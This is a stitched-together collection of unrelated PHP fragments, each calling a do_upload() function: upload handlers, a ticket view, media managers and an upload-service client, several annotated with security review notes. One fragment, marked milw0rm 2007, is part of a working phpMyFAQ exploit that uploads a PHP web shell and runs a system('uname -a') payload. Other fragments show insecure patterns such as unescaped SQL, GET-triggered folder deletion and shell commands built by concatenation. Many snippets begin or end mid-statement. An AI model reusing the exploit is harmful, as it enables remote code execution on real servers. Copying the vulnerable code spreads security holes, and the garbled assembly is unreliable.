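/**
 * Render the "Upload file" page and process a submitted upload.
 *
 * Anonymous visitors get whatever must_log_in() returns. When the form was
 * posted (the 'upload' field is present) and PHP reports a completed,
 * non-empty upload, the temporary file is handed to do_upload() and the
 * "File uploaded" header is printed. Otherwise the form is shown again with
 * the collected error list.
 *
 * NOTE(review): the MIME type and the file-name extension passed to
 * do_upload() are both supplied by the client. do_upload() is not visible
 * here; confirm it checks the real content and restricts the stored
 * extension rather than trusting these two values.
 * NOTE(review): the 8MB limit shown in the form label is not enforced in
 * this function, and the form carries no anti-CSRF token field; confirm both
 * are handled elsewhere.
 */
function content() {
    if (!user_logged_in()) {
        return must_log_in();
    }

    $errors = array();

    if (array_key_exists('upload', $_POST)) {
        $upload = array_key_exists('file', $_FILES) ? $_FILES['file'] : null;

        // Check PHP's own upload status before touching tmp_name: a failed or
        // missing upload leaves tmp_name empty, and filesize('') only warns.
        // is_uploaded_file() confirms the path really is this request's upload.
        if (
            !is_array($upload)
            || !isset($upload['error'], $upload['tmp_name'])
            || $upload['error'] !== UPLOAD_ERR_OK
            || !is_string($upload['tmp_name'])
            || !is_uploaded_file($upload['tmp_name'])
            || filesize($upload['tmp_name']) == 0
        ) {
            $errors[] = 'Please supply a file';
        }

        if (count($errors) == 0) {
            // A name without an extension does not match; pass null instead of
            // reading an undefined $matches[1].
            $extension = preg_match('/\\.([^\\/.]+)$/', $upload['name'], $matches) ? $matches[1] : null;
            $file_id = do_upload($upload['tmp_name'], $upload['type'], $extension, $upload['size']);
            page_header('File uploaded');
            ?> <?php
            return;
        }
    }

    page_header('Upload file');
    show_error_list($errors);
    ?> <form enctype="multipart/form-data" action="" method="post"> <div class="fieldrow"> <div> <label for="file">Select an image <span class="label-extra">(size limit: 8MB)</span></label> <input id="file" name="file" type="file" /> </div> </div> <div class="fieldrow"> <input type="submit" name="upload" value="Upload" /> </div> </form> <?php
}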
// Load one ticket by id together with its category, status and priority
// names, then apply the viewer's access check and store an optional reply
// and an optional attachment. The excerpt ends inside the operator branch.
$query = squery("SELECT t.id,t.randcode,t.status,t.title,t.description,t.unick,t.ufullname,t.uemail,t.uphone,t.uip,t.rep_u,\nt.rep_g,t.open_time,t.opened_by,t.is_real,t.is_private,t.email_upd,t.memo_upd,c1.name AS cat1_name,c2.name AS cat2_name,c3.name AS \ncat3_name,s.status_name,up.priority_name AS upriority,sp.priority_name AS priority,c3.extra,t.ext1,t.ext2,t.ext3,t.merged_to,t.cc,\ng.private_actions,t.lastupd_time \nFROM (karnaf_tickets AS t INNER JOIN karnaf_cat3 AS c3 ON c3.id=t.cat3_id INNER JOIN karnaf_cat2 AS c2 ON c2.id=c3.parent \nINNER JOIN karnaf_cat1 AS c1 ON c1.id=c2.parent INNER JOIN karnaf_statuses AS s ON s.status_id=t.status INNER JOIN karnaf_priorities AS up ON \nup.priority_id=t.upriority INNER JOIN karnaf_priorities AS sp ON sp.priority_id=t.priority LEFT JOIN groups AS g ON g.name=t.rep_g) WHERE t.id=%d", $id);
if ($result = sql_fetch_array($query)) {
    // Access is refused only when all three hold: the viewer is not an
    // operator, the supplied code differs from the stored one, and the viewer
    // is not the ticket's own nick (a different nick, "Guest", or an account
    // registered after the ticket was opened).
    // NOTE(review): the code is compared with a loose `!=`, which type-juggles
    // and is not constant-time; consider a strict, timing-safe comparison such
    // as hash_equals() on string values. How $randcode is populated is not
    // visible here.
    // NOTE(review): the statements below run unless AccessDenied() terminates
    // the request; its definition is not visible here, so confirm it does.
    if (!$isoper && $randcode != $result['randcode'] && ($nick != $result['unick'] || $nick == "Guest" || $a_regtime > (int) $result['open_time'])) {
        AccessDenied("You must provide the ticket verification code to view this page.");
    }
    // A non-empty reply is stored unless the ticket status is 0.
    if (isset($_POST['reply_text']) && !empty($_POST['reply_text']) && $result['status'] != 0) {
        // NOTE(review): the raw POST value is passed as a '%s' argument.
        // Whether squery() escapes or binds its arguments is not visible in
        // this excerpt; confirm before relying on it.
        squery("INSERT INTO karnaf_replies(tid,reply,r_by,r_time,r_from,ip) VALUES(%d,'%s','%s',%d,'%s','%s')", $id, $_POST['reply_text'], $nick, time(), $nick, get_session_ip());
        // Status 2 is moved back to 1 and the assigned user gets a memo.
        if ((int) $result['status'] == 2) {
            squery("UPDATE karnaf_tickets SET status=1,lastupd_time=%d WHERE id=%d AND status=2", time(), $id);
            send_memo($result['rep_u'], "User has replied to ticket #" . $result['id'] . ". For more information visit: " . KARNAF_URL . "/edit.php?id=" . $result['id']);
        }
        echo "<div class=\"status\">Your reply has been saved.</div><br>";
        // Keeps the in-memory row at status 1 for the rest of the page.
        $result['status'] = 1;
    }
    // An attachment is processed whenever the upload carries a file name.
    if (isset($_FILES['attachment-file']['name']) && !empty($_FILES['attachment-file']['name'])) {
        // do_upload() returns an error string; an empty string means success.
        $error = do_upload($id);
        if ($error == "") {
            if ((int) $result['status'] == 2) {
                squery("UPDATE karnaf_tickets SET status=1,lastupd_time=%d WHERE id=%d AND status=2", time(), $id);
                send_memo($result['rep_u'], "User has added an attachment to ticket #" . $result['id'] . ". For more information visit: " . KARNAF_URL . "/edit.php?id=" . $result['id']);
            }
            echo "<div class=\"status\">Your attachment has been saved.</div><br>";
        } else {
            // NOTE(review): $error is written into the page without HTML
            // escaping. If do_upload() ever includes the client-supplied file
            // name in its message, this becomes an HTML injection point;
            // escaping with htmlspecialchars() at this echo would close it.
            echo "<div class=\"status_err\">Error: " . $error . "</div><br>";
        }
    }
    if ($isoper) {
        // Operators in the ticket's group, or Karnaf admins, are flagged admin.
        // NOTE(review): $isadmin is only assigned in this branch; its initial
        // value is not visible in this excerpt.
        if (IsGroupMember($result['rep_g']) || IsKarnafAdminSession()) {
            $isadmin = 1;
        }
        if ($result['is_private'] && !$isadmin) {
} else { if ($_FILES['Filedata']) { $resource = fopen("log.txt", "a"); fwrite($resource, date("Ymd h:i:s") . "UPLOAD - {$_SERVER['REMOTE_ADDR']}" . $_FILES['Filedata']['name'] . " " . $_FILES['Filedata']['type'] . "\n"); fclose($resource); $file_type = $_FILES['Filedata']['type']; $file_name = $_FILES['Filedata']['name']; $file_ext = strtolower(substr($file_name, strrpos($file_name, "."))); //File Size Check if ($_FILES['Filedata']['size'] > $MAX_SIZE) { $message = "The file size is over 2MB."; } else { if (!in_array($file_type, $FILE_MIMES) && !in_array($file_ext, $FILE_EXTS)) { $message = "Sorry, {$file_name}({$file_type}) is not allowed to be uploaded."; } else { $message = do_upload($upload_dir, $upload_url); } } print "<script>window.location.href='{$url_this}?message={$message}'</script>"; } else { if (!$_FILES['Filedata']) { } else { $message = "Invalid File Specified."; } } } /************************************************************ * List Files ************************************************************/ $handle = opendir($upload_dir); $filelist = "";
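// NOTE(review): a plain GET request triggers the folder deletion, and the
// folder name comes straight from the query string. No authorisation or
// anti-CSRF check is visible in this excerpt, and delete_folder() is cut off
// below, so confirm both the caller's checks and the path validation there.
if (isset($_GET['delFolder']) && isset($_GET['dir'])) {
    delete_folder($_GET['delFolder']);
}

if (isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath'])) {
    $dirPathPost = $_POST['dirPath'];

    // dirPath is request data that becomes part of the destination path.
    // Refuse anything that is not a string, contains a NUL byte, or has a
    // ".." path segment, so the upload cannot leave the configured base.
    $dirPathIsSafe = is_string($dirPathPost)
        && strpos($dirPathPost, "\0") === false
        && !preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $dirPathPost);

    if ($dirPathIsSafe) {
        if (strlen($dirPathPost) > 0) {
            if (substr($dirPathPost, 0, 1) == '/') {
                $FILE_ROOT .= $dirPathPost;
            } else {
                $FILE_ROOT = $dirPathPost;
            }
        }
        if (strrpos($FILE_ROOT, '/') != strlen($FILE_ROOT) - 1) {
            $FILE_ROOT .= '/';
        }
        do_upload($_FILES['upload'], $BASE_DIR . $BASE_ROOT . $dirPathPost . '/');
    }
}

/**
 * Move one uploaded file into $dest_dir and flag the upload list for clearing.
 *
 * Only the final path component of the client-supplied name is used, and the
 * temporary path must be a genuine upload of the current request.
 *
 * NOTE(review): no extension or content allow-list is applied here. If
 * $dest_dir is served by the web server, restrict the stored extensions to
 * the types the application actually needs.
 *
 * @param array  $file     One entry of $_FILES (reads 'tmp_name' and 'name').
 * @param string $dest_dir Destination directory, with trailing slash.
 */
function do_upload($file, $dest_dir) {
    global $clearUploads;

    // The browser controls 'name'; strip any directory part (either
    // separator style) so it cannot redirect the write outside $dest_dir.
    $safe_name = (isset($file['name']) && is_string($file['name']))
        ? basename(str_replace('\\', '/', $file['name']))
        : '';

    if (
        $safe_name !== '' && $safe_name !== '.' && $safe_name !== '..'
        && isset($file['tmp_name']) && is_string($file['tmp_name'])
        && is_uploaded_file($file['tmp_name'])
    ) {
        //var_dump($file); echo "DIR:$dest_dir";
        move_uploaded_file($file['tmp_name'], $dest_dir . $safe_name);
    }
    $clearUploads = true;
}

// The listing is cut off inside this function; the visible part is unchanged.
// NOTE(review): $folder is appended to the base directory as received.
function delete_folder($folder) {
    global $BASE_DIR, $refresh_dirs;
    //var_dump($BASE_DIR);
    $del_folder = dir_name($BASE_DIR) . $folder;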
echo "=> Uploading file.\n"; $result = curl_exec($ch); curl_close($ch); @unlink("kebab.php"); $get = $baseurl . "/attachments/1337/kebab.php\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $get); curl_setopt($ch, CURLOPT_PROXY, $proxy); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if (strstr($result, "Un1q")) { echo substr($result, 4); } else { echo "Not vulnerable / error ?\n"; } curl_close($ch); } if ($argc < 3) { printf("Usage: %s http://test.com/phpmyfaq/ \"<? system('uname -a'); ?> \" [proxy]\n", $argv[0]); exit(0); } if ($argc == 4) { $proxy = $argv[3]; } else { $proxy = ""; } do_upload($argv[1], $proxy, $argv[2]); ?> # milw0rm.com [2007-03-01]
} } // action defaults to 'showdir' if (is_null($action)) { $action = 'showdir'; } } switch ($action) { case 'showdir': do_showdir(); break; case 'showupload': do_showupload(); break; case 'upload': do_upload(); break; case 'showmkdir': do_showmkdir(); break; case 'mkdir': do_mkdir(); break; case 'showrename': do_showrename(); break; case 'rename': do_rename(); break; case 'showmove': do_showmove();
// Finish an audio upload: either skip the album cover and render the
// completion page, or store the uploaded cover and record it on the album.
// The excerpt ends inside the second branch.
if ($upload_album_cover == 'no') {
    $show_audio_done = 1;
    $show_image_done = 0;
    $album_image_message = $config['album_image_message'];
    // NOTE(review): $user_theme is interpolated into template paths. Where it
    // comes from is not visible here; confirm it is limited to known theme
    // names before it reaches LoadTemplate().
    $template = "themes/{$user_theme}/templates/main_1.htm";
    $inner_template1 = "themes/{$user_theme}/templates/inner_upload_audio_complete.htm";
    $TBS = new clsTinyButStrong();
    $TBS->NoErr = true;
    $TBS->LoadTemplate("{$template}");
    $TBS->Render = TBS_OUTPUT;
    $TBS->Show();
    @mysql_close();
    // Nothing after this point runs when the cover is skipped.
    die;
} else {
    if ($_FILES['userfile']) {
        // do_upload() returns a three-element array: message, stored picture
        // name, and a flag saying whether to go on.
        $album_cover_change = do_upload($upload_dir);
        $album_image_message = $album_cover_change[0];
        $album_new_pic = $album_cover_change[1];
        $upload_proceed = $album_cover_change[2];
    }
}
if ($upload_proceed == true) {
    // update audio_albums table album cover image
    // NOTE(review): both values are interpolated straight into the SQL text.
    // The origin of $album_id and the escaping of $album_new_pic are not
    // visible here; if either can carry request data this is injectable.
    // A prepared statement with bound parameters removes the question.
    // NOTE(review): the mysql_* extension was removed in PHP 7, and the `@`
    // hides a failed query, so the success page below is shown either way.
    $sql_image = "UPDATE audio_albums SET album_picture = '{$album_new_pic}' WHERE album_id = '{$album_id}'";
    $query_image = @mysql_query($sql_image);
    $show_image_done = 1;
    $album_image_message = $config['album_image_message'];
    $template = "themes/{$user_theme}/templates/main_1.htm";
    $inner_template1 = "themes/{$user_theme}/templates/inner_upload_audio_complete.htm";
    $TBS = new clsTinyButStrong();
    $TBS->NoErr = true;
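/**
 * Store a posted media file under images/stories/<dirPath>/.
 *
 * Does nothing unless the request carries both an 'upload' file entry and a
 * 'dirPath' field. dirPath is request data that becomes part of the
 * destination path, so it is refused when it is not a string, contains a NUL
 * byte, or has a ".." path segment; in that case no file is stored.
 *
 * The earlier $IMG_ROOT bookkeeping was removed: the variable was local to
 * this function (only $mosConfig_absolute_path is declared global), was never
 * read afterwards, and so had no effect beyond undefined-variable notices.
 *
 * NOTE(review): the file name and type are left to do_upload(), which is not
 * visible here; confirm it strips directory parts from the client-supplied
 * name and restricts the stored extensions.
 */
function upload() {
    global $mosConfig_absolute_path;

    if (!isset($_FILES['upload']) || !is_array($_FILES['upload']) || !isset($_POST['dirPath'])) {
        return;
    }

    $dirPathPost = $_POST['dirPath'];

    // Keep the destination inside images/stories: reject traversal segments
    // written with either separator, and NUL bytes that could truncate paths.
    if (
        !is_string($dirPathPost)
        || strpos($dirPathPost, "\0") !== false
        || preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $dirPathPost)
    ) {
        return;
    }

    do_upload($_FILES['upload'], $mosConfig_absolute_path . '/images/stories/' . $dirPathPost . '/');
}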
$name = trim($name, ": "); if (in_array($name, $grab)) { $auth[$name] = trim($parts[1]); } } return $auth; } $auth = do_auth(); printf(" \n **** parsed auth headers for PUT **** \n"); print_r($auth); $ch2 = curl_init(); // get all files in css dir $files = array(); // load everything from local css folder into // <storage-url>/asset/css/local-file-path foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator('css')) as $path) { $filename = sprintf("%s", $path); $pos = strrpos($filename, "/"); if ($pos !== false) { $last = substr($filename, $pos + 1); if ($last == '.' || $last == '..') { printf(" ignore file :: %s \n", $filename); } else { array_push($files, $filename); } } } foreach ($files as $file) { do_upload($ch2, $auth, $file); } curl_close($ch2);
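/**
 * Store a posted media file under COM_MEDIA_BASE . <dirPath> . '/'.
 *
 * josSpoofCheck() runs first. The upload is then processed only when the
 * request carries both an 'upload' file entry and a 'dirPath' field. dirPath
 * is request data that becomes part of the destination path, so it is
 * refused when it is not a string, contains a NUL byte, or has a ".." path
 * segment; in that case no file is stored.
 *
 * The earlier $IMG_ROOT bookkeeping was removed: the variable was local to
 * this function, was never read afterwards, and so had no effect beyond
 * undefined-variable notices.
 *
 * NOTE(review): the file name and type are left to do_upload(), which is not
 * visible here; confirm it strips directory parts from the client-supplied
 * name and restricts the stored extensions.
 */
function upload() {
    josSpoofCheck();

    if (!isset($_FILES['upload']) || !is_array($_FILES['upload']) || !isset($_POST['dirPath'])) {
        return;
    }

    $dirPathPost = $_POST['dirPath'];
    $file = $_FILES['upload'];

    // Keep the destination inside the media base: reject traversal segments
    // written with either separator, and NUL bytes that could truncate paths.
    if (
        !is_string($dirPathPost)
        || strpos($dirPathPost, "\0") !== false
        || preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $dirPathPost)
    ) {
        return;
    }

    do_upload($file, COM_MEDIA_BASE . $dirPathPost . '/');
}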
/**
 * Assemble the row for a newly submitted product from the posted form.
 *
 * Runs the upload first, then reads the form fields in a fixed order. The
 * product is created inactive, dated today, and owned by the given user.
 *
 * NOTE(review): the value returned by do_upload() is not used; the 'image'
 * field is filled with a random number from 1 to 50 as a string. Confirm
 * whether the uploaded file's name was meant to be stored instead.
 * NOTE(review): the posted values are copied as received; any validation
 * has to happen in the caller or the model, neither of which is visible here.
 *
 * @param array $user The owning user; only $user['id'] is read.
 * @return array The product fields keyed by column name.
 */
private function get_info_product($user) {
    $uploaded = do_upload();

    $row = array();
    $row['name'] = $this->input->post('name');
    $row['area_id'] = $this->input->post('area');
    $row['category_id'] = $this->input->post('category');
    $row['feild_id'] = $this->input->post('feild');
    $row['created_date'] = date('Y-m-d', time());
    $row['end_date'] = $this->input->post('enddate');
    $row['content'] = $this->input->post('content');
    $row['user_id'] = $user['id'];
    $row['image'] = (string) rand(1, 50);
    $row['active'] = 0;

    return $row;
}
/**
 * Ask the upload service for its limits and session data, then start the upload.
 *
 * Runs the curl binary with an "op=api_get_limits" form post, parses the
 * printed XML with xml2array(), logs the server URL, session id and size
 * limit, and calls do_upload() for the global $filepath. An empty session id
 * is treated as the free account.
 *
 * NOTE(review): in this listing the credential expressions of the second
 * command appear masked as '******', so that line does not parse as shown.
 */
function get_auth() {
    global $filepath;
    // NOTE(review): the command line is assembled by plain concatenation and
    // none of the parts is passed through escapeshellarg() here. If any of
    // these constants can be set from user-editable configuration, shell
    // metacharacters in it would be executed; confirm their origin.
    // NOTE(review): credentials given as curl -F arguments are visible to
    // other local users in the process list while the command runs.
    if (USERNAME == 'free' && PASSWORD == 'free') {
        $command = CURL_BIN . ' -A ' . CURL_USERAGENTS . ' -s -F "op=api_get_limits" ' . CURL_STARTURL;
    } else {
        $command = CURL_BIN . ' -A ' . CURL_USERAGENTS . ' -s -F "op=api_get_limits" -F "login='******'" -F "password='******'" ' . CURL_STARTURL;
    }
    // exec() returns only the last output line; that value is overwritten
    // below, and the full output is taken from $out instead.
    $xml = exec($command, $out);
    $str = implode("\n", $out);
    $xml = xml2array($str);
    // The final print_log() argument is true on the messages ending in
    // "Exit."; presumably it terminates the script, confirm in print_log().
    if (!array_key_exists('Data', $xml)) {
        print_log('Cannot retrieve XML data. Exit.', 'get_auth', 0, true);
    }
    if (empty($xml['Data']['ServerURL']) || empty($xml['Data']['MaxUploadFilesize'])) {
        print_log('Important XML value is empty.', 'get_auth', 0, false);
        print_log('Uploading aborted. Exit.', 'get_auth', 0, true);
    }
    $xml_error = $xml['Data']['Error'];
    $xml_sessid = $xml['Data']['SessionID'];
    $xml_server = $xml['Data']['ServerURL'];
    $xml_maxsize = $xml['Data']['MaxUploadFilesize'];
    // NOTE(review): the session id is written to the log in clear text;
    // confirm who can read that log.
    print_log('---------------------------------------------------------------------------', 'get_auth', 1, false);
    print_log('ServerURL : ' . $xml_server, 'get_auth', 1, false);
    print_log('SessionID : ' . $xml_sessid, 'get_auth', 1, false);
    print_log('MaxSize : ' . $xml_maxsize . ' MB', 'get_auth', 1, false);
    print_log('---------------------------------------------------------------------------', 'get_auth', 1, false);
    if (empty($xml_error)) {
        // The two calls differ only in the extra trailing false passed for a
        // registered account.
        if (empty($xml_sessid)) {
            print_log('Uploading with free user account.', 'get_auth', 1, false);
            do_upload($filepath, $xml_sessid, $xml_server, $xml_maxsize);
        } else {
            print_log('Uploading with registered user account.', 'get_auth', 1, false);
            do_upload($filepath, $xml_sessid, $xml_server, $xml_maxsize, false);
        }
    } else {
        // Only 'auth_error' is reported; any other error value ends the
        // function without a message.
        if ($xml_error == 'auth_error') {
            print_log('Username/password invalid. Exit.', 'get_auth', 0, true);
        }
    }
}
exec("{$xgettext_executable} `find -name \"*.php\" -o -name \"*.inc\"` -p {$dyn_locales_dir}/ -o messages.pot --keyword=_ -L PHP --add-comments=TRANSLATORS 2>&1", $exec_out, $ret_var); if ($ret_var) { echo "<center>" . _("Strings <b>not</b> rebuilt!") . "</center><br>" . _("This is the <code>xgettext</code> output:") . "<br><br>"; echo "<pre>"; foreach ($exec_out as $v) { echo html_safe($v) . "\n"; } echo "</pre><br>"; } else { echo "<p>" . _("<code>xgettext</code> ran successfully.") . "</p>"; } echo "<p><a href='{$translate_url}'>" . _("Back to the Translation Center") . "</a></p>"; } else { if ($func == "upload") { $locale = validate_locale($_REQUEST['locale']); do_upload($locale); echo "<p><a href='{$translate_url}?func=manage&locale={$locale}'>" . sprintf(_("Back to manage locale %s"), $locale) . "</a></p>"; } else { if ($func == "merge") { $locale = validate_locale($_REQUEST['locale']); $fuzzy = @$_REQUEST['fuzzy']; do_merge($locale, $fuzzy); echo "<p><a href='{$translate_url}?func=manage&locale={$locale}'>" . sprintf(_("Back to manage locale %s"), $locale) . "</a></p>"; } else { if ($func == "manage") { $locale = validate_locale($_REQUEST['locale']); manage_form($locale); } } } }